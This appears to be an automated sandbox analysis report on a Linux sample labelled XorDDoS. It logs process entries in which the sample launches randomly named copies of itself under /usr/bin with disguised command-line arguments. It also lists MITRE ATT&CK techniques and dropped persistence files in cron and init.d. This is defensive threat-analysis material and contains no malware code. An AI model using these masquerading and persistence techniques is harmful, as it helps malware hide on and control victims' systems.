Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 10999, Parent PID: 10997

General

Start time:	19:55:34
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: inquziyqfh PID: 10999, Parent PID: 10997

General

Start time:	19:55:34
Start date:	04/04/2023
Path:	/usr/bin/inquziyqfh
Arguments:	/usr/bin/inquziyqfh top 9452
File size:	548671 bytes
MD5 hash:	c5240c03174adc647b14472a80726172

Chronological Activities

Analysis Process: inquziyqfh PID: 11012, Parent PID: 10999

General

Start time:	19:55:34
Start date:	04/04/2023
Path:	/usr/bin/inquziyqfh
Arguments:	n/a
File size:	548671 bytes
MD5 hash:	c5240c03174adc647b14472a80726172

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11041, Parent PID: 9452

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11042, Parent PID: 11041

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: hzocakrfjc PID: 11042, Parent PID: 3310

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/usr/bin/hzocakrfjc
Arguments:	/usr/bin/hzocakrfjc bash 9452
File size:	548660 bytes
MD5 hash:	2493ae71a6b7a72f3c38d4e611f4a5e1

Chronological Activities

Analysis Process: hzocakrfjc PID: 11046, Parent PID: 11042

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/usr/bin/hzocakrfjc
Arguments:	n/a
File size:	548660 bytes
MD5 hash:	2493ae71a6b7a72f3c38d4e611f4a5e1

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11043, Parent PID: 9452

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11044, Parent PID: 11043

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: hzocakrfjc PID: 11044, Parent PID: 3310

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/usr/bin/hzocakrfjc
Arguments:	/usr/bin/hzocakrfjc whoami 9452
File size:	548660 bytes
MD5 hash:	2493ae71a6b7a72f3c38d4e611f4a5e1

Chronological Activities

Analysis Process: hzocakrfjc PID: 11051, Parent PID: 11044

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/usr/bin/hzocakrfjc
Arguments:	n/a
File size:	548660 bytes
MD5 hash:	2493ae71a6b7a72f3c38d4e611f4a5e1

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11045, Parent PID: 9452

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11047, Parent PID: 11045

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: hzocakrfjc PID: 11047, Parent PID: 3310

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/usr/bin/hzocakrfjc
Arguments:	/usr/bin/hzocakrfjc gnome-terminal 9452
File size:	548660 bytes
MD5 hash:	2493ae71a6b7a72f3c38d4e611f4a5e1

Chronological Activities

Analysis Process: hzocakrfjc PID: 11055, Parent PID: 11047

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/usr/bin/hzocakrfjc
Arguments:	n/a
File size:	548660 bytes
MD5 hash:	2493ae71a6b7a72f3c38d4e611f4a5e1

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11048, Parent PID: 9452

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11050, Parent PID: 11048

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: hzocakrfjc PID: 11050, Parent PID: 3310

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/usr/bin/hzocakrfjc
Arguments:	/usr/bin/hzocakrfjc "ps -ef" 9452
File size:	548660 bytes
MD5 hash:	2493ae71a6b7a72f3c38d4e611f4a5e1

Chronological Activities

Analysis Process: hzocakrfjc PID: 11064, Parent PID: 11050

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/usr/bin/hzocakrfjc
Arguments:	n/a
File size:	548660 bytes
MD5 hash:	2493ae71a6b7a72f3c38d4e611f4a5e1

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11053, Parent PID: 9452

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11056, Parent PID: 11053

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: hzocakrfjc PID: 11056, Parent PID: 3310

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/usr/bin/hzocakrfjc
Arguments:	/usr/bin/hzocakrfjc "netstat -antop" 9452
File size:	548660 bytes
MD5 hash:	2493ae71a6b7a72f3c38d4e611f4a5e1

Chronological Activities

Analysis Process: hzocakrfjc PID: 11062, Parent PID: 11056

General

Start time:	19:55:39
Start date:	04/04/2023
Path:	/usr/bin/hzocakrfjc
Arguments:	n/a
File size:	548660 bytes
MD5 hash:	2493ae71a6b7a72f3c38d4e611f4a5e1

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11106, Parent PID: 9452

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11107, Parent PID: 11106

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: eyvooyilzg PID: 11107, Parent PID: 3310

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/usr/bin/eyvooyilzg
Arguments:	/usr/bin/eyvooyilzg "grep \"A\"" 9452
File size:	548682 bytes
MD5 hash:	b3c0433cb96af4d84583a4cb9814d55d

Chronological Activities

Analysis Process: eyvooyilzg PID: 11116, Parent PID: 11107

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/usr/bin/eyvooyilzg
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	b3c0433cb96af4d84583a4cb9814d55d

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11108, Parent PID: 9452

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11109, Parent PID: 11108

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: eyvooyilzg PID: 11109, Parent PID: 3310

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/usr/bin/eyvooyilzg
Arguments:	/usr/bin/eyvooyilzg uptime 9452
File size:	548682 bytes
MD5 hash:	b3c0433cb96af4d84583a4cb9814d55d

Chronological Activities

Analysis Process: eyvooyilzg PID: 11119, Parent PID: 11109

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/usr/bin/eyvooyilzg
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	b3c0433cb96af4d84583a4cb9814d55d

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11110, Parent PID: 9452

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11111, Parent PID: 11110

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: eyvooyilzg PID: 11111, Parent PID: 3310

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/usr/bin/eyvooyilzg
Arguments:	/usr/bin/eyvooyilzg "cd /etc" 9452
File size:	548682 bytes
MD5 hash:	b3c0433cb96af4d84583a4cb9814d55d

Chronological Activities

Analysis Process: eyvooyilzg PID: 11115, Parent PID: 11111

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/usr/bin/eyvooyilzg
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	b3c0433cb96af4d84583a4cb9814d55d

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11112, Parent PID: 9452

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11113, Parent PID: 11112

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: eyvooyilzg PID: 11113, Parent PID: 3310

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/usr/bin/eyvooyilzg
Arguments:	/usr/bin/eyvooyilzg pwd 9452
File size:	548682 bytes
MD5 hash:	b3c0433cb96af4d84583a4cb9814d55d

Chronological Activities

Analysis Process: eyvooyilzg PID: 11122, Parent PID: 11113

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/usr/bin/eyvooyilzg
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	b3c0433cb96af4d84583a4cb9814d55d

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11114, Parent PID: 9452

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11117, Parent PID: 11114

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: eyvooyilzg PID: 11117, Parent PID: 3310

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/usr/bin/eyvooyilzg
Arguments:	/usr/bin/eyvooyilzg "route -n" 9452
File size:	548682 bytes
MD5 hash:	b3c0433cb96af4d84583a4cb9814d55d

Chronological Activities

Analysis Process: eyvooyilzg PID: 11126, Parent PID: 11117

General

Start time:	19:55:44
Start date:	04/04/2023
Path:	/usr/bin/eyvooyilzg
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	b3c0433cb96af4d84583a4cb9814d55d

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11161, Parent PID: 9452

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11162, Parent PID: 11161

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: yklepkdsai PID: 11162, Parent PID: 3310

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/usr/bin/yklepkdsai
Arguments:	/usr/bin/yklepkdsai "netstat -an" 9452
File size:	548682 bytes
MD5 hash:	77fa98c6c1de36087a4437c1b6aeb7ef

Chronological Activities

Analysis Process: yklepkdsai PID: 11168, Parent PID: 11162

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/usr/bin/yklepkdsai
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	77fa98c6c1de36087a4437c1b6aeb7ef

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11163, Parent PID: 9452

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11164, Parent PID: 11163

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: yklepkdsai PID: 11164, Parent PID: 3310

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/usr/bin/yklepkdsai
Arguments:	/usr/bin/yklepkdsai whoami 9452
File size:	548682 bytes
MD5 hash:	77fa98c6c1de36087a4437c1b6aeb7ef

Chronological Activities

Analysis Process: yklepkdsai PID: 11175, Parent PID: 11164

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/usr/bin/yklepkdsai
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	77fa98c6c1de36087a4437c1b6aeb7ef

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11165, Parent PID: 9452

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11166, Parent PID: 11165

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: yklepkdsai PID: 11166, Parent PID: 3310

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/usr/bin/yklepkdsai
Arguments:	/usr/bin/yklepkdsai "ps -ef" 9452
File size:	548682 bytes
MD5 hash:	77fa98c6c1de36087a4437c1b6aeb7ef

Chronological Activities

Analysis Process: yklepkdsai PID: 11173, Parent PID: 11166

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/usr/bin/yklepkdsai
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	77fa98c6c1de36087a4437c1b6aeb7ef

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11167, Parent PID: 9452

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11169, Parent PID: 11167

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: yklepkdsai PID: 11169, Parent PID: 3310

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/usr/bin/yklepkdsai
Arguments:	/usr/bin/yklepkdsai "cat resolv.conf" 9452
File size:	548682 bytes
MD5 hash:	77fa98c6c1de36087a4437c1b6aeb7ef

Chronological Activities

Analysis Process: yklepkdsai PID: 11172, Parent PID: 11169

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/usr/bin/yklepkdsai
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	77fa98c6c1de36087a4437c1b6aeb7ef

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11170, Parent PID: 9452

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11171, Parent PID: 11170

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: yklepkdsai PID: 11171, Parent PID: 3310

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/usr/bin/yklepkdsai
Arguments:	/usr/bin/yklepkdsai who 9452
File size:	548682 bytes
MD5 hash:	77fa98c6c1de36087a4437c1b6aeb7ef

Chronological Activities

Analysis Process: yklepkdsai PID: 11184, Parent PID: 11171

General

Start time:	19:55:49
Start date:	04/04/2023
Path:	/usr/bin/yklepkdsai
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	77fa98c6c1de36087a4437c1b6aeb7ef

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11216, Parent PID: 9452

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11217, Parent PID: 11216

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: gacoxqlwsi PID: 11217, Parent PID: 3310

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/usr/bin/gacoxqlwsi
Arguments:	/usr/bin/gacoxqlwsi su 9452
File size:	548682 bytes
MD5 hash:	bff7bbe7deccd699fdb646a66fe06517

Chronological Activities

Analysis Process: gacoxqlwsi PID: 11225, Parent PID: 11217

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/usr/bin/gacoxqlwsi
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	bff7bbe7deccd699fdb646a66fe06517

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11218, Parent PID: 9452

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11219, Parent PID: 11218

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: gacoxqlwsi PID: 11219, Parent PID: 3310

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/usr/bin/gacoxqlwsi
Arguments:	/usr/bin/gacoxqlwsi ifconfig 9452
File size:	548682 bytes
MD5 hash:	bff7bbe7deccd699fdb646a66fe06517

Chronological Activities

Analysis Process: gacoxqlwsi PID: 11227, Parent PID: 11219

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/usr/bin/gacoxqlwsi
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	bff7bbe7deccd699fdb646a66fe06517

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11220, Parent PID: 9452

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11221, Parent PID: 11220

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: gacoxqlwsi PID: 11221, Parent PID: 3310

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/usr/bin/gacoxqlwsi
Arguments:	/usr/bin/gacoxqlwsi "ls -la" 9452
File size:	548682 bytes
MD5 hash:	bff7bbe7deccd699fdb646a66fe06517

Chronological Activities

Analysis Process: gacoxqlwsi PID: 11230, Parent PID: 11221

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/usr/bin/gacoxqlwsi
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	bff7bbe7deccd699fdb646a66fe06517

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11222, Parent PID: 9452

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11223, Parent PID: 11222

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: gacoxqlwsi PID: 11223, Parent PID: 3310

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/usr/bin/gacoxqlwsi
Arguments:	/usr/bin/gacoxqlwsi "ifconfig eth0" 9452
File size:	548682 bytes
MD5 hash:	bff7bbe7deccd699fdb646a66fe06517

Chronological Activities

Analysis Process: gacoxqlwsi PID: 11228, Parent PID: 11223

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/usr/bin/gacoxqlwsi
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	bff7bbe7deccd699fdb646a66fe06517

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11224, Parent PID: 9452

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 11226, Parent PID: 11224

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: gacoxqlwsi PID: 11226, Parent PID: 3310

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/usr/bin/gacoxqlwsi
Arguments:	/usr/bin/gacoxqlwsi ls 9452
File size:	548682 bytes
MD5 hash:	bff7bbe7deccd699fdb646a66fe06517

Chronological Activities

Analysis Process: gacoxqlwsi PID: 11231, Parent PID: 11226

General

Start time:	19:55:54
Start date:	04/04/2023
Path:	/usr/bin/gacoxqlwsi
Arguments:	n/a
File size:	548682 bytes
MD5 hash:	bff7bbe7deccd699fdb646a66fe06517

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at command within Linux operating systems enables administrators to schedule tasks.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report iJl2Sb6qRa

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Threatname: XorDDoS

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/cron.hourly/gcc.sh

/etc/crontab

/etc/init.d/.depend.boot

